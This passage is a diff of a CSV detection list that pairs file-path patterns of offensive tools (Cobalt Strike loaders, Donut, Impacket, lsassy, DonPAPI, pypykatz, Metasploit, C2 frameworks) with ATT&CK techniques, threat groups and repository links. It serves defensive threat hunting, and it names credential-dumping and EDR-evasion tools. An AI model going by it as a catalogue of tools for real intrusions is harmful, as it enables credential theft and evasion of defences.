TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/loader/bypass.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/loader/bypass.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*/loader/x64/Release/loader.exe*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" "*/loadercrypt_*.php*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/local-exploits/master/CVE*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/LocalPotato.git*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*/LocalPrivEsc/*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/LocalPrivEsc/*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*/localroot/2.6.x/elflbl*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/localroot/2.6.x/h00lyshit*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/Locksmith.git*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","472","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" -"*/log4shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*/login_scanner*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/login-securite/DonPAPI*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/Locksmith.git*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*/log4shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/login_scanner*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/login-securite/DonPAPI*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*/logs/*/becon_*.log","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" -"*/logs/beacon_log*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*/lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/logs/beacon_log*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/loot_default/*.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*/loot_default/*.ps1*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*/loot_default/*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*/loot_finder*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/lpBunny/bof-registry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" -"*/lsa_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/lsa_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/lsass.DMP*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*/lsass/beacon.h*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" -"*/LSASSProtectionBypass/CredGuard.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*/LsassSilentProcessExit.git*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*/lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*/LSASSProtectionBypass/CredGuard.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*/LsassSilentProcessExit.git*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*/lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/lsassy_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/lucksec/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/lucksec/CVE-2022-0847","1","1","N/A","N/A","1","1","4","2022-03-08T01:50:39Z","2022-03-08T01:17:09Z" "*/lu-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/luijait/arpspoofing*","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","1","N/A","N/A","1","15","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" @@ -4253,138 +4280,145 @@ "*/MaccaroniC2*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*/MacroMeter*","offensive_tool_keyword","MacroMeter","VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript","T1027 - T1059 - T1564 - T1071","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/MacroMeter","1","0","N/A","N/A","1","62","31","2018-04-23T09:14:49Z","2017-05-16T20:04:41Z" "*/MacroPatterns.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"*/Macro-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/Macro-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/MacroWord_Payload/macro.txt*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" "*/magnitude.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider 